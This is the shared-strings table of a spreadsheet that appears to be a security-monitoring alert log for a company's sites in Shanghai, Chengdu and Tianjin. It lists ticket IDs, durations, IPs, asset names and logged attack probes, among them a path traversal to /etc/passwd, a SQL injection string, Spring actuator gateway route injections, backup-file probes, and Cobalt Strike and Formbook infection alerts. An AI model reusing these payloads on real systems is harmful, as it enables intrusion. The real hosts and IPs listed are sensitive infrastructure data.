  <si>
    <t>E25102815198</t>
  </si>
  <si>
    <t>691675295f097c8d5a5f2dc2</t>
  </si>
  <si>
    <t>amisjd.haiheangroup.com:7788/erupt-api/ai/agent/list</t>
  </si>
  <si>
    <t>691655880426a03076232d3f</t>
  </si>
  <si>
    <t>oayz.haiheangroup.com:8080/</t>
  </si>
  <si>
    <t>上海园区MSS资产&gt;oa系统-水印服务器</t>
  </si>
  <si>
    <t>6916555b5f097c8d5a5f2adb</t>
  </si>
  <si>
    <t>oayz.haiheangroup.com:8080/CFIDE/administrator/index.cfm</t>
  </si>
  <si>
    <t>6915c7d80426a03076232183</t>
  </si>
  <si>
    <t>/api/downloads?fileName=../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>6915b11e1894bc6a22573d51</t>
  </si>
  <si>
    <t>691590f7503d3682c7f0bdde</t>
  </si>
  <si>
    <t>69158f24d2695babf3ee54d7</t>
  </si>
  <si>
    <t>69157796d2695babf3ee5040</t>
  </si>
  <si>
    <t>69157600503d3682c7f0b900</t>
  </si>
  <si>
    <t>6914290f1894bc6a225707b5</t>
  </si>
  <si>
    <t>69156a391894bc6a225730d3</t>
  </si>
  <si>
    <t>691558200189fa4663422acd</t>
  </si>
  <si>
    <t>68fb54312e3ad59eded8c145</t>
  </si>
  <si>
    <t>E25102414705</t>
  </si>
  <si>
    <t>68d64ee72e3ad59edeae6d69</t>
  </si>
  <si>
    <t>E25092619703</t>
  </si>
  <si>
    <t>0天0时3分11秒</t>
  </si>
  <si>
    <t>68d64ed02e3ad59edeae6d46</t>
  </si>
  <si>
    <t>E25092619701</t>
  </si>
  <si>
    <t>68d64ece2e3ad59edeae6d40</t>
  </si>
  <si>
    <t>E25092619619</t>
  </si>
  <si>
    <t>0天0时3分30秒</t>
  </si>
  <si>
    <t>68d64e722e3ad59edeae6c8c</t>
  </si>
  <si>
    <t>E25092619704</t>
  </si>
  <si>
    <t>0天0时5分8秒</t>
  </si>
  <si>
    <t>68d64e492e3ad59edeae6c46</t>
  </si>
  <si>
    <t>E25092619658</t>
  </si>
  <si>
    <t>0天0时3分40秒</t>
  </si>
  <si>
    <t>69153b4c5f097c8d5a5f06b2</t>
  </si>
  <si>
    <t>691539871894bc6a225725fa</t>
  </si>
  <si>
    <t>6915381d1894bc6a2257259f</t>
  </si>
  <si>
    <t>691457ebad7ff37e9747d83d</t>
  </si>
  <si>
    <t>691446635f097c8d5a5eed58</t>
  </si>
  <si>
    <t>101.204.24.178:19850/+CSCOT+/oem-customization</t>
  </si>
  <si>
    <t>成都园区&gt;深大中间层-商餐服务器</t>
  </si>
  <si>
    <t>691446550426a0307622ef7c</t>
  </si>
  <si>
    <t>101.204.24.178:19850/php.old</t>
  </si>
  <si>
    <t>691443900426a0307622ef26</t>
  </si>
  <si>
    <t>69143ebf0ebab8d028bfda87</t>
  </si>
  <si>
    <t>691437ce0426a0307622ed9a</t>
  </si>
  <si>
    <t>101.204.24.178:8839/site.zip</t>
  </si>
  <si>
    <t>成都园区&gt;深大中间层-票务服务器</t>
  </si>
  <si>
    <t>691437cd5f097c8d5a5eeb4d</t>
  </si>
  <si>
    <t>101.204.24.178:8839/StreamingStatistics</t>
  </si>
  <si>
    <t>6914350162ca193b90aae5f5</t>
  </si>
  <si>
    <t>69142b720ebab8d028bfd7b7</t>
  </si>
  <si>
    <t>691423c1000ea00a408ac165</t>
  </si>
  <si>
    <t>101.204.24.178:8059/druid/submitLogin</t>
  </si>
  <si>
    <t>E25111213390</t>
  </si>
  <si>
    <t>101.82.138.183</t>
  </si>
  <si>
    <t>69141f36c3c4edc677188b11</t>
  </si>
  <si>
    <t>6913f4260426a0307622e389</t>
  </si>
  <si>
    <t>171.221.206.175:8019/admin_old</t>
  </si>
  <si>
    <t>成都园区&gt;深大中间层-闸机服务器</t>
  </si>
  <si>
    <t>6913f4085f097c8d5a5ee186</t>
  </si>
  <si>
    <t>171.221.206.175:8019/+CSCOT+/oem-customization</t>
  </si>
  <si>
    <t>6913deb60426a0307622dfaf</t>
  </si>
  <si>
    <t>171.221.206.175:8085/aspx.bak</t>
  </si>
  <si>
    <t>6913e0195f097c8d5a5ede0e</t>
  </si>
  <si>
    <t>6913debb4e5efa425edca062</t>
  </si>
  <si>
    <t>6913d65c0ebab8d028bfca96</t>
  </si>
  <si>
    <t>6913d4b60426a0307622dde7</t>
  </si>
  <si>
    <t>6912fb3c3dbf20cc7e4ba52f</t>
  </si>
  <si>
    <t>6912ec873dbf20cc7e4ba2f8</t>
  </si>
  <si>
    <t>220.249.115.2:19080/jsp.old</t>
  </si>
  <si>
    <t>6912ee0e6048b5c17ed758be</t>
  </si>
  <si>
    <t>27.17.5.74:8020/actuator/conditions</t>
  </si>
  <si>
    <t>6912f1363dbf20cc7e4ba3ae</t>
  </si>
  <si>
    <t>6912d7f03dbf20cc7e4b9fb1</t>
  </si>
  <si>
    <t>27.17.5.74:8099/static/uploadify/uploadFile.jsp</t>
  </si>
  <si>
    <t>6912c8163dbf20cc7e4b9d71</t>
  </si>
  <si>
    <t>60.209.248.165:19881/js.bak</t>
  </si>
  <si>
    <t>6912cf40c7a72ded8d4e8d38</t>
  </si>
  <si>
    <t>69128dc951cf71cd0a0bf3c3</t>
  </si>
  <si>
    <t>6912ae4151cf71cd0a0bf9de</t>
  </si>
  <si>
    <t>天津园区MSS资产&gt;应用服务器</t>
  </si>
  <si>
    <t>6912a4896048b5c17ed74dfe</t>
  </si>
  <si>
    <t>60.28.99.74:8059/localsettings.php.bak</t>
  </si>
  <si>
    <t>6912ab043dbf20cc7e4b996a</t>
  </si>
  <si>
    <t>60.28.99.74:8059/actuator/gateway/routes/hack1762831083</t>
  </si>
  <si>
    <t>6912964f6048b5c17ed74b53</t>
  </si>
  <si>
    <t>60.28.99.74:8099/actuator/gateway/routes/hack1762825771</t>
  </si>
  <si>
    <t>691297a051cf71cd0a0bf5b4</t>
  </si>
  <si>
    <t>69128711d70372911989e257</t>
  </si>
  <si>
    <t>6912852bbd7b77a4d5df01b2</t>
  </si>
  <si>
    <t>6911918b3dbf20cc7e4b7d6a</t>
  </si>
  <si>
    <t>219.147.9.110:8220/downloader.php</t>
  </si>
  <si>
    <t>691191836048b5c17ed733db</t>
  </si>
  <si>
    <t>219.147.9.110:8220/yyoa/ext/trafaxserver/SystemManage/config.jsp</t>
  </si>
  <si>
    <t>69118a53847a12121155d81b</t>
  </si>
  <si>
    <t>691191be3dbf20cc7e4b7d6e</t>
  </si>
  <si>
    <t>691170c6a9f4662eb8e15488</t>
  </si>
  <si>
    <t>69116e9dcf567f61a5d9beef</t>
  </si>
  <si>
    <t>69114d82bd7b77a4d5dee0db</t>
  </si>
  <si>
    <t>69113fcb6048b5c17ed724e1</t>
  </si>
  <si>
    <t>69113cc5fd40266bf405b267</t>
  </si>
  <si>
    <t>691139ba1d1f37f209ec29a4</t>
  </si>
  <si>
    <t>69113678c7a72ded8d4e5ab5</t>
  </si>
  <si>
    <t>691135a33dbf20cc7e4b6c4d</t>
  </si>
  <si>
    <t>690fe465bd7b77a4d5deb8c0</t>
  </si>
  <si>
    <t>691031463dbf20cc7e4b54c3</t>
  </si>
  <si>
    <t>690fe36fbd7b77a4d5deb88d</t>
  </si>
  <si>
    <t>690d4293c7a72ded8d4df6ca</t>
  </si>
  <si>
    <t>690e913b3dbf20cc7e4b2d96</t>
  </si>
  <si>
    <t>690da6d73dbf20cc7e4b1ad6</t>
  </si>
  <si>
    <t>60.209.248.165:19080/asp.backup</t>
  </si>
  <si>
    <t>690d77ebfd40266bf4055658</t>
  </si>
  <si>
    <t>690d5fa4115e7cb6dcef5478</t>
  </si>
  <si>
    <t>0天0时0分16秒</t>
  </si>
  <si>
    <t>690d5038ba9de8138d79eab1</t>
  </si>
  <si>
    <t>690d4d6b3dbf20cc7e4b0bff</t>
  </si>
  <si>
    <t>690d4a808665c467c60afb91</t>
  </si>
  <si>
    <t>E25110704682</t>
  </si>
  <si>
    <t>0天0时3分56秒</t>
  </si>
  <si>
    <t>690d3f502f71f6a5367d8004</t>
  </si>
  <si>
    <t>0天0时0分15秒</t>
  </si>
  <si>
    <t>690d3acc3dbf20cc7e4b08b0</t>
  </si>
  <si>
    <t>690bed963dbf20cc7e4ae564</t>
  </si>
  <si>
    <t>690c0b30ba9de8138d79c798</t>
  </si>
  <si>
    <t>690c03eb51cf71cd0a0b498e</t>
  </si>
  <si>
    <t>690bfa9a6048b5c17ed6a028</t>
  </si>
  <si>
    <t>690bf42ae7fb38d7e77bcd5b</t>
  </si>
  <si>
    <t>690bf3791d1f37f209eb9df4</t>
  </si>
  <si>
    <t>690bf049bd7b77a4d5de52a0</t>
  </si>
  <si>
    <t>690befa5bd7b77a4d5de5285</t>
  </si>
  <si>
    <t>690bed50d7037291198933ca</t>
  </si>
  <si>
    <t>690b066f3dbf20cc7e4ad11d</t>
  </si>
  <si>
    <t>oayz.haiheangroup.com:8080/WEB-INF/jboss-web.xml~</t>
  </si>
  <si>
    <t>690b07e86048b5c17ed68a11</t>
  </si>
  <si>
    <t>/cgi-bin/order.cgi</t>
  </si>
  <si>
    <t>690abcffc7a72ded8d4db210</t>
  </si>
  <si>
    <t>690aaea83dbf20cc7e4ac48b</t>
  </si>
  <si>
    <t>690a9d23bd7b77a4d5de2c7a</t>
  </si>
  <si>
    <t>690a9b93bd7b77a4d5de2c3b</t>
  </si>
  <si>
    <t>6909b5432f71f6a5367d255b</t>
  </si>
  <si>
    <t>6909b42f3dbf20cc7e4aae2f</t>
  </si>
  <si>
    <t>69096faa2828cdf7e644887d</t>
  </si>
  <si>
    <t>690959e726bf785f69f2ef10</t>
  </si>
  <si>
    <t>6907fb3abd7b77a4d5dde506</t>
  </si>
  <si>
    <t>690949e6c7a72ded8d4d87d7</t>
  </si>
  <si>
    <t>69087a503dbf20cc7e4a8e6b</t>
  </si>
  <si>
    <t>27.17.5.74:8020/WEB-INF/web.xml~</t>
  </si>
  <si>
    <t>69087a546048b5c17ed647e5</t>
  </si>
  <si>
    <t>27.17.5.74:8020/WEB-INF/web.xml_</t>
  </si>
  <si>
    <t>690868e6115e7cb6dceecddd</t>
  </si>
  <si>
    <t>69085bee3dbf20cc7e4a8ab3</t>
  </si>
  <si>
    <t>690846f9c1bf177223660bd0</t>
  </si>
  <si>
    <t>69084697a9f4662eb8e06b6a</t>
  </si>
  <si>
    <t>69083e69e7fb38d7e77b6c25</t>
  </si>
  <si>
    <t>6908357c847a12121154db61</t>
  </si>
  <si>
    <t>69080258cf567f61a5d8bf67</t>
  </si>
  <si>
    <t>690809de1d1f37f209eb3491</t>
  </si>
  <si>
    <t>690808d9a9f4662eb8e061c9</t>
  </si>
  <si>
    <t>69070613a9f4662eb8e04cfe</t>
  </si>
  <si>
    <t>6906ce1a51cf71cd0a0ac116</t>
  </si>
  <si>
    <t>6906afe5847a12121154b37b</t>
  </si>
  <si>
    <t>6906c3cfc7a72ded8d4d4ad2</t>
  </si>
  <si>
    <t>6905a5296048b5c17ed60493</t>
  </si>
  <si>
    <t>6905a4e93dbf20cc7e4a4c23</t>
  </si>
  <si>
    <t>69058ce31d1f37f209eafedd</t>
  </si>
  <si>
    <t>69058c34762571b75ec8f593</t>
  </si>
  <si>
    <t>6904608b847a121211547ffe</t>
  </si>
  <si>
    <t>690427b12828cdf7e6440427</t>
  </si>
  <si>
    <t>6904091ad703729119886996</t>
  </si>
  <si>
    <t>690406dd601c87ede2d8de6e</t>
  </si>
  <si>
    <t>E25103117168</t>
  </si>
  <si>
    <t>0天0时4分24秒</t>
  </si>
  <si>
    <t>6904044b2f71f6a5367c93e3</t>
  </si>
  <si>
    <t>6902b54b51cf71cd0a0a581e</t>
  </si>
  <si>
    <t>6903bd17601c87ede2d8ca43</t>
  </si>
  <si>
    <t>E25103111695</t>
  </si>
  <si>
    <t>6903a62415080e9ccf00725e</t>
  </si>
  <si>
    <t>E25103107172</t>
  </si>
  <si>
    <t>0天0时3分28秒</t>
  </si>
  <si>
    <t>69039cf315080e9ccf005534</t>
  </si>
  <si>
    <t>E25103103701</t>
  </si>
  <si>
    <t>69038c2615080e9ccf0045f1</t>
  </si>
  <si>
    <t>E25103100616</t>
  </si>
  <si>
    <t>69038a69601c87ede2d86ed0</t>
  </si>
  <si>
    <t>E25103037177</t>
  </si>
  <si>
    <t>0天0时3分31秒</t>
  </si>
  <si>
    <t>690379457eeca13b31867a93</t>
  </si>
  <si>
    <t>E25103036081</t>
  </si>
  <si>
    <t>0天0时5分4秒</t>
  </si>
  <si>
    <t>6903768b7eeca13b3186670e</t>
  </si>
  <si>
    <t>E25103031908</t>
  </si>
  <si>
    <t>0天0时5分10秒</t>
  </si>
  <si>
    <t>690375707eeca13b31865ea9</t>
  </si>
  <si>
    <t>E25103029733</t>
  </si>
  <si>
    <t>0天0时3分15秒</t>
  </si>
  <si>
    <t>690374c67eeca13b3186599d</t>
  </si>
  <si>
    <t>E25103027875</t>
  </si>
  <si>
    <t>690373b27eeca13b318651b0</t>
  </si>
  <si>
    <t>E25103026660</t>
  </si>
  <si>
    <t>690371777eeca13b31863f53</t>
  </si>
  <si>
    <t>E25103024343</t>
  </si>
  <si>
    <t>0天0时4分53秒</t>
  </si>
  <si>
    <t>690371777eeca13b31863f52</t>
  </si>
  <si>
    <t>E25103024228</t>
  </si>
  <si>
    <t>0天0时4分45秒</t>
  </si>
  <si>
    <t>690371777eeca13b31863f50</t>
  </si>
  <si>
    <t>E25103024300</t>
  </si>
  <si>
    <t>0天0时4分50秒</t>
  </si>
  <si>
    <t>690371777eeca13b31863f4e</t>
  </si>
  <si>
    <t>E25103024302</t>
  </si>
  <si>
    <t>690371727eeca13b31863f2e</t>
  </si>
  <si>
    <t>E25103024339</t>
  </si>
  <si>
    <t>0天0时4分57秒</t>
  </si>
  <si>
    <t>6903702c7eeca13b318632d2</t>
  </si>
  <si>
    <t>E25103023262</t>
  </si>
  <si>
    <t>0天0时6分3秒</t>
  </si>
  <si>
    <t>690316c06048b5c17ed5c27a</t>
  </si>
  <si>
    <t>690300d9bd7b77a4d5dd6d3e</t>
  </si>
  <si>
    <t>6901cec2d703729119882b68</t>
  </si>
  <si>
    <t>6902f5fd51cf71cd0a0a6303</t>
  </si>
  <si>
    <t>6902f4a0ba9de8138d78d83c</t>
  </si>
  <si>
    <t>6902f3b5e7fb38d7e77ae759</t>
  </si>
  <si>
    <t>6902f2a3c7a72ded8d4ceb76</t>
  </si>
  <si>
    <t>6902ba67a9f4662eb8dfe16b</t>
  </si>
  <si>
    <t>6902b41cbd7b77a4d5dd6104</t>
  </si>
  <si>
    <t>6902b398115e7cb6dcee372b</t>
  </si>
  <si>
    <t>6902b328ba9de8138d78ccfd</t>
  </si>
  <si>
    <t>690257b4601c87ede2d7dc5a</t>
  </si>
  <si>
    <t>E25103001723</t>
  </si>
  <si>
    <t>0天0时3分41秒</t>
  </si>
  <si>
    <t>6901db031d1f37f209ea9b43</t>
  </si>
  <si>
    <t>6901b5c46048b5c17ed597b1</t>
  </si>
  <si>
    <t>6901b549115e7cb6dcee1cb9</t>
  </si>
  <si>
    <t>6901b1e76048b5c17ed596d8</t>
  </si>
  <si>
    <t>690056a2847a121211540211</t>
  </si>
  <si>
    <t>690198662828cdf7e643b847</t>
  </si>
  <si>
    <t>690166ff847a1212115420d5</t>
  </si>
  <si>
    <t>690166a16048b5c17ed58829</t>
  </si>
  <si>
    <t>690163512828cdf7e643ad85</t>
  </si>
  <si>
    <t>690162b3c7a72ded8d4cb52d</t>
  </si>
  <si>
    <t>69008ed43dbf20cc7e49be56</t>
  </si>
  <si>
    <t>60.28.99.74:8099/api/blade-system/menu/list</t>
  </si>
  <si>
    <t>69008dc56048b5c17ed57324</t>
  </si>
  <si>
    <t>60.28.99.74:8099/</t>
  </si>
  <si>
    <t>6900932b6048b5c17ed573d3</t>
  </si>
  <si>
    <t>690084b7e7fb38d7e77a9be5</t>
  </si>
  <si>
    <t>69000b5351cf71cd0a0a033d</t>
  </si>
  <si>
    <t>690064ebba9de8138d78862e</t>
  </si>
  <si>
    <t>69002c1dbd7b77a4d5dd1275</t>
  </si>
  <si>
    <t>690019ec847a12121153f869</t>
  </si>
  <si>
    <t>68ff02cdc1bf177223651034</t>
  </si>
  <si>
    <t>69000fce6048b5c17ed55f34</t>
  </si>
  <si>
    <t>69000d29d70372911987eca8</t>
  </si>
  <si>
    <t>68ff43ea115e7cb6dcedd411</t>
  </si>
  <si>
    <t>68ff15c05633dec667c7eb75</t>
  </si>
  <si>
    <t>68ff13ecc7a72ded8d4c73c0</t>
  </si>
  <si>
    <t>68ff0565e7fb38d7e77a6e8f</t>
  </si>
  <si>
    <t>68fedb4e1d1f37f209ea3c24</t>
  </si>
  <si>
    <t>68fec86bc7a72ded8d4c672b</t>
  </si>
  <si>
    <t>68fec1c6ba9de8138d78515a</t>
  </si>
  <si>
    <t>68fdd7313dbf20cc7e496fca</t>
  </si>
  <si>
    <t>68fd7ff6c7a72ded8d4c469b</t>
  </si>
  <si>
    <t>68fd7e7e762571b75ec80899</t>
  </si>
  <si>
    <t>68fb33c33dbf20cc7e4926fb</t>
  </si>
  <si>
    <t>68fc231b1d1f37f209e9f4be</t>
  </si>
  <si>
    <t>68fc20e1847a121211538bec</t>
  </si>
  <si>
    <t>68fc1fc6115e7cb6dced7bc1</t>
  </si>
  <si>
    <t>68fc1e102f71f6a5367bb3b1</t>
  </si>
  <si>
    <t>68fb97815633dec667c78d69</t>
  </si>
  <si>
    <t>117.62.125.106</t>
  </si>
  <si>
    <t>68fb35556048b5c17ed4dfac</t>
  </si>
  <si>
    <t>68f9f1b3a9f4662eb8def0fa</t>
  </si>
  <si>
    <t>68fb11c31d1f37f209e9da7a</t>
  </si>
  <si>
    <t>68fb0f15762571b75ec7c8b7</t>
  </si>
  <si>
    <t>68f9db353dbf20cc7e48fefc</t>
  </si>
  <si>
    <t>68facd3a2828cdf7e642f255</t>
  </si>
  <si>
    <t>125.38.164.199</t>
  </si>
  <si>
    <t>68f9bd9bbd7b77a4d5dc6073</t>
  </si>
  <si>
    <t>68f9e4a8d7037291198745de</t>
  </si>
  <si>
    <t>68f9dd03a9f4662eb8deee03</t>
  </si>
  <si>
    <t>68f9dc9d51cf71cd0a095995</t>
  </si>
  <si>
    <t>68f874ab2828cdf7e642b02a</t>
  </si>
  <si>
    <t>68f98a15e7fb38d7e779d3ef</t>
  </si>
  <si>
    <t>68f98254847a121211533fa7</t>
  </si>
  <si>
    <t>68f8a4b1e7fb38d7e779be7b</t>
  </si>
  <si>
    <t>68f7454c51cf71cd0a090ce2</t>
  </si>
  <si>
    <t>68f842992828cdf7e642a809</t>
  </si>
  <si>
    <t>68f840e151cf71cd0a0926eb</t>
  </si>
  <si>
    <t>68f8299fbd7b77a4d5dc2d80</t>
  </si>
  <si>
    <t>68f82897c7a72ded8d4bade8</t>
  </si>
  <si>
    <t>68f7756dc1bf177223643cc2</t>
  </si>
  <si>
    <t>68f7544fe7fb38d7e77997c2</t>
  </si>
  <si>
    <t>68f6dc2f847a12121152edf2</t>
  </si>
  <si>
    <t>68f6d7313dbf20cc7e489cb1</t>
  </si>
  <si>
    <t>68f5f580ba9de8138d77522d</t>
  </si>
  <si>
    <t>68f5e6bdbd7b77a4d5dbeb67</t>
  </si>
  <si>
    <t>117.144.71.74</t>
  </si>
  <si>
    <t>68f5cd6c3dbf20cc7e487f04</t>
  </si>
  <si>
    <t>68f5ccd5115e7cb6dcecc04d</t>
  </si>
  <si>
    <t>68f5c518e7fb38d7e779630d</t>
  </si>
  <si>
    <t>68f5c092c7a72ded8d4b6537</t>
  </si>
  <si>
    <t>117.154.20.130</t>
  </si>
  <si>
    <t>68f5aa35c7a72ded8d4b61a4</t>
  </si>
  <si>
    <t>68f58aec847a12121152c38b</t>
  </si>
  <si>
    <t>68f5895d847a12121152c33b</t>
  </si>
  <si>
    <t>68f587c76048b5c17ed42ccb</t>
  </si>
  <si>
    <t>68f587436048b5c17ed42cb0</t>
  </si>
  <si>
    <t>68f4a27726bf785f69f0a6f1</t>
  </si>
  <si>
    <t>219.139.206.134</t>
  </si>
  <si>
    <t>68f45acf762571b75ec6fe08</t>
  </si>
  <si>
    <t>60.27.75.224</t>
  </si>
  <si>
    <t>68f45d28115e7cb6dcec9927</t>
  </si>
  <si>
    <t>68f437893dbf20cc7e4852c0</t>
  </si>
  <si>
    <t>68f438353dbf20cc7e4852cc</t>
  </si>
  <si>
    <t>68f335bb3dbf20cc7e483960</t>
  </si>
  <si>
    <t>68f333efa9f4662eb8de2f3f</t>
  </si>
  <si>
    <t>68f32fe5847a1212115285f3</t>
  </si>
  <si>
    <t>68f320bec1bf17722363bd48</t>
  </si>
  <si>
    <t>68f195165633dec667c66355</t>
  </si>
  <si>
    <t>68f1a391d7037291198651a1</t>
  </si>
  <si>
    <t>125.38.166.217</t>
  </si>
  <si>
    <t>68d64ec12e3ad59edeae6d2b</t>
  </si>
  <si>
    <t>E25092619697</t>
  </si>
  <si>
    <t>0天0时3分45秒</t>
  </si>
  <si>
    <t>68d64e972e3ad59edeae6cd8</t>
  </si>
  <si>
    <t>68f19ac6115e7cb6dcec49c5</t>
  </si>
  <si>
    <t>68f1937c6048b5c17ed3c02c</t>
  </si>
  <si>
    <t>68f1924626bf785f69f04bf1</t>
  </si>
  <si>
    <t>68f191783dbf20cc7e4807a0</t>
  </si>
  <si>
    <t>68ecf95415080e9ccfeb2fcb</t>
  </si>
  <si>
    <t>E25101403262</t>
  </si>
  <si>
    <t>0天8时20分52秒</t>
  </si>
  <si>
    <t>6268f060741679c6813a65f8</t>
  </si>
  <si>
    <t>68ed134b15080e9ccfeb4a44</t>
  </si>
  <si>
    <t>E25101318557</t>
  </si>
  <si>
    <t>0天0时4分5秒</t>
  </si>
  <si>
    <t>68ed19162e3ad59edec67700</t>
  </si>
  <si>
    <t>0天0时3分37秒</t>
  </si>
  <si>
    <t>68d62887a4fe1c22b263f1cd</t>
  </si>
  <si>
    <t>E25092613393</t>
  </si>
  <si>
    <t>50940</t>
  </si>
  <si>
    <t>192.168.32.59</t>
  </si>
  <si>
    <t>68d5060e4e01022397f62bcf</t>
  </si>
  <si>
    <t>43.198.149.5:3399</t>
  </si>
  <si>
    <t>E25092513021</t>
  </si>
  <si>
    <t>43.198.149.5</t>
  </si>
  <si>
    <t>57091</t>
  </si>
  <si>
    <t>3399</t>
  </si>
  <si>
    <t>主机存在感染黑客工具家族cobaltstrike</t>
  </si>
  <si>
    <t>192.168.2.41</t>
  </si>
  <si>
    <t>应急工单&gt;渗透框架</t>
  </si>
  <si>
    <t>68d2aefba4fe1c22b260b0c9</t>
  </si>
  <si>
    <t>175.44.167.197:8090</t>
  </si>
  <si>
    <t>E25092314199</t>
  </si>
  <si>
    <t>175.44.167.197</t>
  </si>
  <si>
    <t>2e416b180000</t>
  </si>
  <si>
    <t>59709</t>
  </si>
  <si>
    <t>68cc3863ef8b5f90926957a9</t>
  </si>
  <si>
    <t>E25091900628</t>
  </si>
  <si>
    <t>0天0时5分3秒</t>
  </si>
  <si>
    <t>68c6ee78ea1ed3efc1a058f4</t>
  </si>
  <si>
    <t>E25091500854</t>
  </si>
  <si>
    <t>0天0时3分29秒</t>
  </si>
  <si>
    <t>68c6e2e4ef8b5f909265fc51</t>
  </si>
  <si>
    <t>E25091508773</t>
  </si>
  <si>
    <t>0天8时21分13秒</t>
  </si>
  <si>
    <t>68c6e227ea1ed3efc1a00461</t>
  </si>
  <si>
    <t>E25091428369</t>
  </si>
  <si>
    <t>68c6e0d4ef8b5f909265f607</t>
  </si>
  <si>
    <t>E25091508613</t>
  </si>
  <si>
    <t>成都园区</t>
  </si>
  <si>
    <t>0天8时22分7秒</t>
  </si>
  <si>
    <t>68c6d882ef8b5f909265ac0a</t>
  </si>
  <si>
    <t>E25091421382</t>
  </si>
  <si>
    <t>0天0时3分34秒</t>
  </si>
  <si>
    <t>68c6d7ecef8b5f909265a79f</t>
  </si>
  <si>
    <t>E25091421029</t>
  </si>
  <si>
    <t>0天0时3分53秒</t>
  </si>
  <si>
    <t>68c6d059ea1ed3efc19f5f92</t>
  </si>
  <si>
    <t>E25091413253</t>
  </si>
  <si>
    <t>0天0时3分51秒</t>
  </si>
  <si>
    <t>68c6d024ea1ed3efc19f5ec0</t>
  </si>
  <si>
    <t>E25091413399</t>
  </si>
  <si>
    <t>68c6d011ef8b5f9092655b59</t>
  </si>
  <si>
    <t>E25091413291</t>
  </si>
  <si>
    <t>0天0时5分5秒</t>
  </si>
  <si>
    <t>68c6cf5eea1ed3efc19f5c40</t>
  </si>
  <si>
    <t>E25091411707</t>
  </si>
  <si>
    <t>68c6cf48ef8b5f90926558cb</t>
  </si>
  <si>
    <t>E25091411673</t>
  </si>
  <si>
    <t>0天0时3分57秒</t>
  </si>
  <si>
    <t>192.168.0.76</t>
  </si>
  <si>
    <t>68c4c40a30a113486f6bd84c</t>
  </si>
  <si>
    <t>E25091306365</t>
  </si>
  <si>
    <t>192.168.0.125</t>
  </si>
  <si>
    <t>56930</t>
  </si>
  <si>
    <t>68c43ea1ea1ed3efc19c8ec6</t>
  </si>
  <si>
    <t>E25091220380</t>
  </si>
  <si>
    <t>68c43d7eef8b5f909263d7d5</t>
  </si>
  <si>
    <t>E25091219167</t>
  </si>
  <si>
    <t>68c1a692ef8b5f9092621e0e</t>
  </si>
  <si>
    <t>E25091101651</t>
  </si>
  <si>
    <t>68beffff9d127848a55e9e18</t>
  </si>
  <si>
    <t>125.109.5.26:8090</t>
  </si>
  <si>
    <t>E25090900136</t>
  </si>
  <si>
    <t>125.109.5.26</t>
  </si>
  <si>
    <t>上海园区MSS资产&gt;动物管理系统-备用数据库</t>
  </si>
  <si>
    <t>62392</t>
  </si>
  <si>
    <t>68bb0258be477f6371d906c1</t>
  </si>
  <si>
    <t>E25090527092</t>
  </si>
  <si>
    <t>68bb04cabe477f6371d90fa9</t>
  </si>
  <si>
    <t>E25090529183</t>
  </si>
  <si>
    <t>68bb04a3be477f6371d90f4c</t>
  </si>
  <si>
    <t>E25090529066</t>
  </si>
  <si>
    <t>0天0时4分25秒</t>
  </si>
  <si>
    <t>68bb0120be477f6371d90155</t>
  </si>
  <si>
    <t>E25090526259</t>
  </si>
  <si>
    <t>0天0时4分23秒</t>
  </si>
  <si>
    <t>68bafed3be477f6371d8f972</t>
  </si>
  <si>
    <t>E25090524442</t>
  </si>
  <si>
    <t>0天0时3分20秒</t>
  </si>
  <si>
    <t>68bafd82be477f6371d8f54d</t>
  </si>
  <si>
    <t>E25090605026</t>
  </si>
  <si>
    <t>0天8时22分6秒</t>
  </si>
  <si>
    <t>68bafd81be477f6371d8f54a</t>
  </si>
  <si>
    <t>E25090604997</t>
  </si>
  <si>
    <t>0天8时21分59秒</t>
  </si>
  <si>
    <t>68bafd7ebe477f6371d8f543</t>
  </si>
  <si>
    <t>E25090605013</t>
  </si>
  <si>
    <t>68bafd7dbe477f6371d8f53e</t>
  </si>
  <si>
    <t>E25090604982</t>
  </si>
  <si>
    <t>0天8时21分57秒</t>
  </si>
  <si>
    <t>68bafd74be477f6371d8f515</t>
  </si>
  <si>
    <t>E25090605010</t>
  </si>
  <si>
    <t>0天8时22分16秒</t>
  </si>
  <si>
    <t>68a7c425be477f6371c4e2ff</t>
  </si>
  <si>
    <t>E25082204226</t>
  </si>
  <si>
    <t>0天0时4分47秒</t>
  </si>
  <si>
    <t>689d95f7b2b8b8c13c4c7306</t>
  </si>
  <si>
    <t>E25081414896</t>
  </si>
  <si>
    <t>0天0时3分47秒</t>
  </si>
  <si>
    <t>689d67dcb2b8b8c13c4c5dc3</t>
  </si>
  <si>
    <t>E25081412850</t>
  </si>
  <si>
    <t>0天0时3分58秒</t>
  </si>
  <si>
    <t>主机存在感染木马远控家族formbook</t>
  </si>
  <si>
    <t>689d4ad493691a5f9cd96ba1</t>
  </si>
  <si>
    <t>43.163.90.50:80</t>
  </si>
  <si>
    <t>E25081407906</t>
  </si>
  <si>
    <t>43.163.90.50</t>
  </si>
  <si>
    <t>2e35baa00000</t>
  </si>
  <si>
    <t>天津园区MSS资产&gt;中间层服务器（前场-散客与团客）-2</t>
  </si>
  <si>
    <t>57374</t>
  </si>
  <si>
    <t>689d49e193691a5f9cd96b10</t>
  </si>
  <si>
    <t>E25081407844</t>
  </si>
  <si>
    <t>57346</t>
  </si>
  <si>
    <t>68994945598589cdfa70e3a9</t>
  </si>
  <si>
    <t>122.144.156.34:88/send_order.cgi</t>
  </si>
  <si>
    <t>E25081105083</t>
  </si>
  <si>
    <t>47.121.219.185</t>
  </si>
  <si>
    <t>60480</t>
  </si>
  <si>
    <t>689305e1e42dc1cdc6d4f8a8</t>
  </si>
  <si>
    <t>www.f2pool.com</t>
  </si>
  <si>
    <t>E25080615544</t>
  </si>
  <si>
    <t>65251</t>
  </si>
  <si>
    <t>内部威胁&gt;信息泄露</t>
  </si>
  <si>
    <t>68930148e42dc1cdc6d4f7b1</t>
  </si>
  <si>
    <t>[::1]' UNION SELECT '/etc/passwd</t>
  </si>
  <si>
    <t>曹嘉</t>
  </si>
  <si>
    <t>11771</t>
  </si>
  <si>
    <t>68923ff4ffa9bd8d537ed0ee</t>
  </si>
  <si>
    <t>E25080601386</t>
  </si>
  <si>
    <t>68923f75b2b8b8c13c471022</t>
  </si>
  <si>
    <t>E25080601371</t>
  </si>
  <si>
    <t>688f901fcc474ca8dfd345ba</t>
  </si>
  <si>
    <t>137.220.224.108:27551</t>
  </si>
  <si>
    <t>E25080400348</t>
  </si>
  <si>
    <t>137.220.224.108</t>
  </si>
  <si>
    <t>50506</t>
  </si>
  <si>
    <t>27551</t>
  </si>
  <si>
